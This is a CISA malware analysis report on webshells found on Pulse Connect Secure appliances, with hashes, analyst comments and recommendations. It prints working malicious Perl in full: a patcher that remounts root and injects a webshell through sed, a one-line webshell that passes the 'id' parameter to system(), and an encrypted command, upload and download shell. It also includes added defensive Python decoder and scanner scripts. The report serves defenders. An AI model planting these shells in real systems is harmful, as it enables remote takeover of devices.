Malware Analysis Report (AR21-202B)

MAR-10333243-1.v1: Pulse Connect Secure

Summary

Malware Analysis Report
10333243.r1.v1
2021-07-14

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

Four (4) files were submitted to CISA for analysis related to a Pulse Secure Perl Common Gateway Interface (CGI) exploit. The files contain webshells or are designed to propagate shells that allow remote code execution or unauthorized access. This analysis is derived from malicious files found on Pulse Connect Secure devices.

For a downloadable copy of IOCs, see: MAR-10333243-1.v1WHITE.stix.

Submitted Files (4)

a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85 (DSUpgrade.pm)

bef423bd85a25d14ffa511a0e04194e59b283057bd41689d473f79d227942c98 (licenseserverproto.cgi)

d3982747d9b589ea20581b0448bddfd7c8a7cdad4760a99b4de762742833640a (licenseserverproto.cgi)

ec3dc5a11b66c5b3ab006ac786914de674e50d0b08c6f6d0cfe7247dbe67a496 (healthcheck.cgi)

Findings

a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85

Tags

trojan webshell

Details
Name DSUpgrade.pm
Size 5270 bytes
Type Perl5 module source, ASCII text, with very long lines
MD5 d855ebd2adeaf2b3c87b28e77e9ce4d4
SHA1 1e43bc7cde1c2ac7b0db7b74b3be47334171d410
SHA256 a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85
SHA512 d94795f11c04862b054d2f83babca034c20bfd00c2c0abe1e1fcfdb3854924a0d9944d0f168147060311d948b1bb194f27eaa491563e7b00ba58e776a4a6f676
ssdeep 96:FYIFAu1JZtGm4OcAHgDfX27AF1K2dsvWlgzP5Ft8gb16rJ2yXp6uIvWZlGMQbvek:eIB1XcTfX20Dds+gF3Ar8yXp6uIyUMQB
Entropy 5.031760
Antivirus
ClamAV Unix.Trojan.ATRIUM-9855919-0
YARA Rules

No matches found.

ssdeep Matches
99 359b86d7f20430f0418b8401be34251bcddcc8aa48803597d8d78caaa547c875
91 463023f0969b2b52bc491d8787de876e59f0d48446f908d16d1ce763bbe05ee9
99 c366c9d41c2bff9fce8a74e2a323f2e104149cf993413dddd8514bb69b054d69
Relationships
a3b60b4bc4... Related_To d3982747d9b589ea20581b0448bddfd7c8a7cdad4760a99b4de762742833640a
Description

The file contains malicious code that was patched into the Pulse Secure application.

--Begin Malicious Code--
my $cgi_p="/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi";
my $cmd_x="sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install";
system("/bin/mount -o remount,rw /dev/root /");
system("/bin/tar", "-xzf", "/tmp/new-pack.tgz", "-C", "/tmp","./installer");
system("cp -f /tmp/installer/do-install /pkg/");
system("cp -f /tmp/installer/VERSION /pkg/");
system("cp -f /tmp/installer/sysboot-shlib /pkg/");
system("cp -f /tmp/installer/losetup /pkg/");
system("$cmd_x");
system("rm -rf /tmp/installer");
my $td = time - $ts;
my $status = $? % 255;
if ($status == 0) {
   print $html " complete ($td seconds)</li>";
   print $console " complete\r\n";
}
else {
   print $html " failed</li>";
   print $console " failed\r\n";
}


return $status == 0;
}
--End Malicious Code--

The patched-in code uses the following SED command to patch a malicious webshell into the Pulse Secure system file "/pkg/do-install":

--Begin Malicious SED Command--
my $cmd_x="sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install"
--End Malicious SED Command--

The purpose of the webshell is to accept a parameter named "id" from an incoming web application POST request, and also to copy another instance of the shell into the file whose path is held in '$cgi_p', which resolves to the legitimate file 'licenseserverproto.cgi'. The webshell then treats the data provided in the "id" parameter as an operating system command and executes it locally using the system() function.

d3982747d9b589ea20581b0448bddfd7c8a7cdad4760a99b4de762742833640a

Tags

webshell

Details
Name licenseserverproto.cgi
Size 2105 bytes
Type Perl script text executable
MD5 e50edf64239b84be02ee5902c22ab336
SHA1 1f26ef302ebc881380aa227ddd8eaebdad54679f
SHA256 d3982747d9b589ea20581b0448bddfd7c8a7cdad4760a99b4de762742833640a
SHA512 9acee1c2ca0ca24b76c2caab545abaea65e390b6b1f9e058e405bb438ce95eb20a0c1a10512f0b594ebab6dd5f8c0d5228eb3bcf0f8ba1a0f0a35fb0d3410eef
ssdeep 48:ECLYmeAJAZo1BuswT4o7oo7vpBBBQWBZ7zSH72BZ7TtH7CN4/to7jH7XH76bejBv:E4YkJAZfv/wO27Y0
Entropy 5.119005
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches
97 44a8b2187c8d181a73285379b4566ed9d39d4ed208d633dcd0dda67a0a64e2a4
97 8fcec6ba8d033408926a7d1e3995fd63450e7bcdec7c637e644063a1432a5971
99 bef423bd85a25d14ffa511a0e04194e59b283057bd41689d473f79d227942c98
97 dc985611d4017c11bdbc8d894453ad7e844c122d4c870255a6a86a247a8f98f6
97 ea1574595f87171c26f483df77dec52b0c5c73dd37f4dd554944cd6a8b484d17
Relationships
d3982747d9... Related_To a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85
Description

This artifact is a Pulse Secure CGI application that has been modified with the following malicious webshell:

---Begin Malicious Webshell---
if(CGI::param("id")){print "Cache-Control: no-cache\n";print "Content-type: text/html\n\n";my $na=CGI::param("id");system("$na");}else{&main();}
---End Malicious Webshell---

The webshell is designed to perform an initial check to determine whether data was passed into the web application within a parameter named "id". If this parameter is provided, the code extracts its contents and executes them on the target system using the system() function. If no "id" parameter is passed to the application, the code simply executes the main() function of the original Pulse Secure application.

ec3dc5a11b66c5b3ab006ac786914de674e50d0b08c6f6d0cfe7247dbe67a496

Tags

webshell

Details
Name healthcheck.cgi
Size 9272 bytes
Type Perl script text executable
MD5 f23e94a38f0a93df46ba83786f3180e0
SHA1 2f1eddf6af9284f6b6c0a8b14fc3e5986ee601c7
SHA256 ec3dc5a11b66c5b3ab006ac786914de674e50d0b08c6f6d0cfe7247dbe67a496
SHA512 ec6b5f25ccdf9a251ff8ba10086820c4cf841e1d487f242edf1f6d7b1b2437f6b2fd12b80989c80a008fb5e7469713971afb39703df7ee556df24669a3124e0d
ssdeep 192:5zwJNuIYj7rcCOk1QrhMeWyOUV9AWojcZiOQiQsfinnoK9Cih1pa+7yi3hm:5zwJwrXWOUV9AWojoiOujQ
Entropy 5.114695
Antivirus
Symantec Hacktool.Webshell
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This artifact is a Pulse Secure CGI script that has been maliciously modified. The modification allows for remote command execution and uploads and downloads of encrypted files. The malicious code is displayed below. Analyst comments are in brackets []:

---Begin Malicious Code---
use MIME::Base64;
use Crypt::RC4;

my $ph="[REDACTED]"; [Hard coded RC4 key.]

sub r [Generates random bytes to be used in (sub a) for encryption.]
{
my $n=$_[0];
my $rs;
   for (my $i=0;$i<$n;$i++)
   {
   my $n1=int(rand(256));
   $rs.=chr($n1);
   }
return $rs;
}

sub a [RC4 encrypts a string that includes a random 6 byte key, RC4 key ($ph above), and the payload, then base64 encodes the string.]
{
my $st=$_[0];
my $k=r(6);
my $en = RC4( $k.$ph, $st);
return encode_base64($k.$en);
}

sub b [Base64 decodes a payload and then decodes using the above RC4 key ($ph) and 6 byte key.]
{
my $s= decode_base64($_[0]);
my $l=length($s);
my $k= substr($s,0,6);
my $en=substr($s,6,$l-6);
my $de = RC4( $k.$ph, $en );
return $de;
}

sub c [Downloads a file and uses the (sub b) function above to decrypt its name, or uploads a file and uses the (sub a) function above to encrypt it.]
{
my $fi=CGI::param('img');
my $FN=b($fi);
my $fd;
print "Content-type: application/x-download\n";
open(*FILE, "<$FN" );
   while(<FILE>)
   {
    $fd=$fd.$_;
   }
close(*FILE);
print "Content-Disposition: attachment; filename=tmp\n\n";
print a($fd);
}

sub d [Decrypts a file using the (sub b) function above and writes out the file.]
{
print "Cache-Control: no-cache\n";
print "Content-type: text/html\n\n";
my $fi = CGI::param('cert');
$fi=b($fi);
my $pa=CGI::param('md5');
$pa=b($pa);
open (*outfile, ">$pa");
print outfile $fi;
close (*outfile);
}

sub e [Decrypts an incoming command and executes as system. If the command has the wrong parameter it returns "Error 404".]
{
print "Cache-Control: no-cache\n";
print "Content-type: image/gif\n\n";
my $na=CGI::param('name');
$na=b($na);my $rt;
   if (!$na or $na eq "cd")
   {
    $rt="Error 404";
   }
    else
   {
   my $ot="/tmp/1";
   system("$na >/tmp/1 2>&1");
   open(*cmd_result,"<$ot");
    while(<cmd_result>)
    {
       $rt=$rt.$_;
    }
   close(*cmd_result);
   unlink $ot;
   }
print a($rt);
}

sub f [Responds to POST requests.]
{
if(CGI::param('cert')) [If it receives a file it attempts to write it.]
{
   d();
}
elsif(CGI::param('img') and CGI::param('name')) [If it receives an encrypted file name in 'img' it reads, encrypts and returns that file (sub c).]
{
   c();
}
elsif(CGI::param('name') and CGI::param('img') eq "") [If it receives a command in 'name' with an empty 'img' it executes the command (sub e), which returns "Error 404" for an empty or "cd" command.]
{
   e();
}
else [Do normal processing.]
{
    &main();
}
}
if ($ENV{'REQUEST_METHOD'} eq "POST") [If it is a POST request, follow the (sub f) function above.]
{
f();
}
else
{
&main(); [Do normal processing.]
}
---End Malicious Code---


The last part of this file contains modified code that renders a dialog box for searching for files to download. Before download, the files are RC4 encrypted and base64 encoded. The program uses the hard-coded key for the RC4 encryption.
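To illustrate the wrapping scheme used by subs a and b and the request routing in sub f, here is an added Python decoder; it is not code from the report or from the malware. The RC4 key PH is a placeholder for the redacted `$ph` value, and the sample request at the bottom is constructed. With the real key recovered from the modified script, `decode_request` turns the parameters of a captured POST body back into the command, file name or file contents they carried, and `unwrap` decodes the response the shell returned.

```python
"""Decoder for the RC4+base64 parameter wrapping used by the modified
healthcheck.cgi described above (added example, not the report's code)."""
import base64
import os

# The real key ($ph) is redacted in the report; this placeholder stands in
# for the value an analyst would recover from the modified script.
PH = b"PLACEHOLDER-RC4-KEY"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA), equivalent to Crypt::RC4's RC4($key, $data)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wrap(payload: bytes, ph: bytes = PH, prefix=None) -> str:
    """Mirror of sub a: k = 6 random bytes, ct = RC4(k . ph, payload),
    result = base64(k . ct). Perl's encode_base64 wraps at 76 columns, as
    base64.encodebytes does. A fixed prefix makes the output reproducible."""
    k = os.urandom(6) if prefix is None else prefix
    if len(k) != 6:
        raise ValueError("prefix must be exactly 6 bytes")
    return base64.encodebytes(k + rc4(k + ph, payload)).decode("ascii")


def unwrap(blob: str, ph: bytes = PH) -> bytes:
    """Mirror of sub b: strip the 6-byte prefix, derive k . ph, decrypt."""
    raw = base64.b64decode(blob)  # whitespace/newlines are ignored, as in Perl
    k, ct = raw[:6], raw[6:]
    return rc4(k + ph, ct)


def classify_request(params: dict) -> str:
    """Route a parsed POST body the way sub f does, so a captured request can
    be labelled: write_file (sub d), read_file (sub c), run_command (sub e)."""
    if params.get("cert"):
        return "write_file"
    if params.get("img") and params.get("name"):
        return "read_file"
    if params.get("name") and params.get("img", "") == "":
        return "run_command"
    return "normal"


# Which wrapped parameters each action carries, per the analysed subs:
# d: cert = file contents, md5 = destination path; c: img = file to read;
# e: name = command (an empty command or "cd" gets "Error 404" back).
WRAPPED_FIELDS = {
    "write_file": ("cert", "md5"),
    "read_file": ("img",),
    "run_command": ("name",),
}


def decode_request(params: dict, ph: bytes = PH) -> dict:
    """Classify a request and decrypt every wrapped parameter it carries."""
    action = classify_request(params)
    decoded = {"action": action}
    for field in WRAPPED_FIELDS.get(action, ()):
        if field in params:
            decoded[field] = unwrap(params[field], ph)
    return decoded


# Constructed capture: the body a run_command POST would carry, built with a
# fixed prefix so the example is reproducible (not from any real device).
FIXED_PREFIX = bytes(range(6))
SAMPLE_REQUEST = {"name": wrap(b"id", prefix=FIXED_PREFIX), "img": ""}

if __name__ == "__main__":
    print(decode_request(SAMPLE_REQUEST))
```

The same `unwrap` also decodes the shell's responses, since sub c and sub e return `a($rt)`, and a response of "Error 404" after decoding marks an empty or "cd" command rather than a failed request.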

bef423bd85a25d14ffa511a0e04194e59b283057bd41689d473f79d227942c98

Tags

webshell

Details
Name licenseserverproto.cgi
Size 2104 bytes
Type Perl script text executable
MD5 a0ce730cffc65e6950c6a5d1d2de0ebb
SHA1 620bfbc94296271c3c6d71b97a8b5486d63347b3
SHA256 bef423bd85a25d14ffa511a0e04194e59b283057bd41689d473f79d227942c98
SHA512 c2102a112e7fd41cda15fbab438b6b849e072beaaf0650d209fb9b4350e260cb3a611eac3acf9f2aa6c8ce9be071aed1362db7619f14d94990d00cada4256b77
ssdeep 48:E1LYmeAJAZo1BuswT4o7oo7vpBBBQWBZ7zSH72BZ7TtH7CN4/to7jH7XH76bejBv:EJYkJAZfv/wO27Y0
Entropy 5.120040
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This artifact is a Pulse Secure CGI application that has been modified with the following malicious webshell:

---Begin Malicious Webshell---
if(CGI::param("id")){print "Cache-Control: no-cache\n";print "Content-type: text/html\n\n";my $na=CGI::param("id");system("$na");}else{&main();}
---End Malicious Webshell---

The webshell is designed to perform an initial check to determine whether data was passed into the web application within a parameter named "id". If this parameter is provided, the code extracts its contents and executes them on the target system using the system() function. If no "id" parameter is passed to the application, the code simply executes the main() function of the original Pulse Secure application.
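As an added example (not part of the CISA report or of any Pulse Secure code), the following Python script turns the indicators described for DSUpgrade.pm and for the two modified licenseserverproto.cgi samples into a file scanner: it matches the four SHA256 values listed in this report and searches Perl/CGI sources for the "id"-parameter-to-system() one-liner, the `sed -i` edit of `/pkg/do-install`, and the read-write remount of `/dev/root`. The sample files embedded at the bottom are constructed for a self-check and do not come from any device; pass a directory (for example a mounted image of the appliance's web root) to scan real files.

```python
"""Scan Pulse Connect Secure Perl/CGI files for the webshell and patcher
indicators described in MAR-10333243-1.v1 (added example, not CISA's tool)."""
import hashlib
import re
import sys
from pathlib import Path

# SHA256 values of the four submitted files, taken from the report.
KNOWN_SHA256 = {
    "a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85",  # DSUpgrade.pm
    "bef423bd85a25d14ffa511a0e04194e59b283057bd41689d473f79d227942c98",  # licenseserverproto.cgi
    "d3982747d9b589ea20581b0448bddfd7c8a7cdad4760a99b4de762742833640a",  # licenseserverproto.cgi
    "ec3dc5a11b66c5b3ab006ac786914de674e50d0b08c6f6d0cfe7247dbe67a496",  # healthcheck.cgi
}

# Content indicators, applied line by line as (name, regex) pairs.
INDICATORS = [
    # The one-line shell: an "id" CGI parameter assigned to a scalar and passed
    # straight to system(); the backreference ties the two statements together.
    ("webshell_id_param_to_system", re.compile(
        r'my\s+(\$\w+)\s*=\s*CGI::param\(\s*["\']id["\']\s*\)\s*;\s*'
        r'system\(\s*"?\1"?\s*\)')),
    # DSUpgrade.pm patcher: sed -i rewriting the upgrade script /pkg/do-install.
    ("do_install_sed_patch", re.compile(r'sed\s+-i\b.*?/pkg/do-install')),
    # DSUpgrade.pm patcher: remounting the root filesystem read-write.
    ("root_remount_rw", re.compile(r'mount\s+-o\s+remount,rw\s+/dev/root')),
]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def scan_text(name: str, data: bytes) -> dict:
    """Return hash-match status and per-line indicator hits for one file."""
    text = data.decode("utf-8", errors="replace")
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for ind_name, rx in INDICATORS:
            if rx.search(line):
                hits.append((ind_name, lineno))
    return {
        "name": name,
        "hash_match": sha256_hex(data) in KNOWN_SHA256,
        "indicators": hits,
    }


def scan_path(path: Path) -> dict:
    return scan_text(str(path), path.read_bytes())


def scan_tree(root: Path, suffixes=(".cgi", ".pm", ".pl")) -> list:
    """Walk a directory and keep only files with a hash match or an indicator."""
    findings = []
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix in suffixes:
            result = scan_path(p)
            if result["hash_match"] or result["indicators"]:
                findings.append(result)
    return findings


# Constructed samples (not from any real device) used for the self-check.
BENIGN_CGI = b"""#!/home/perl/perl
use CGI;
sub main { print "Content-type: text/html\\n\\n"; print "ok"; }
&main();
"""
# Same script with the one-liner from the report spliced in place of &main();
TROJANED_CGI = BENIGN_CGI.replace(b"&main();", (
    b'if(CGI::param("id")){print "Cache-Control: no-cache\\n";'
    b'print "Content-type: text/html\\n\\n";my $na=CGI::param("id");'
    b'system("$na");}else{&main();}'))
# Two lines shaped like the DSUpgrade.pm patcher (sed payload abbreviated).
PATCHER_FRAGMENT = b"""system("/bin/mount -o remount,rw /dev/root /");
my $cmd_x="sed -i '/echo_console/i(...)' /pkg/do-install";
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = scan_tree(Path(sys.argv[1]))
    else:
        results = [scan_text("benign.cgi", BENIGN_CGI),
                   scan_text("trojaned.cgi", TROJANED_CGI),
                   scan_text("patcher.pm", PATCHER_FRAGMENT)]
    for r in results:
        flags = [f"{n}@{ln}" for n, ln in r["indicators"]]
        print(r["name"], "HASH-MATCH" if r["hash_match"] else "",
              flags or "clean")
```

The hash set catches only the exact samples in this report, while the regexes survive the re-keying and whitespace changes seen between the two licenseserverproto.cgi variants (2104 and 2105 bytes); the heavily escaped copy of the one-liner inside DSUpgrade.pm's `$cmd_x` is not matched by the webshell regex, which is why the remount and `do-install` indicators are checked separately.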

Relationship Summary

a3b60b4bc4... Related_To d3982747d9b589ea20581b0448bddfd7c8a7cdad4760a99b4de762742833640a
d3982747d9... Related_To a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to CISA at 1-888-282-0870 or the CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

Revisions

July 21, 2021: Initial Version
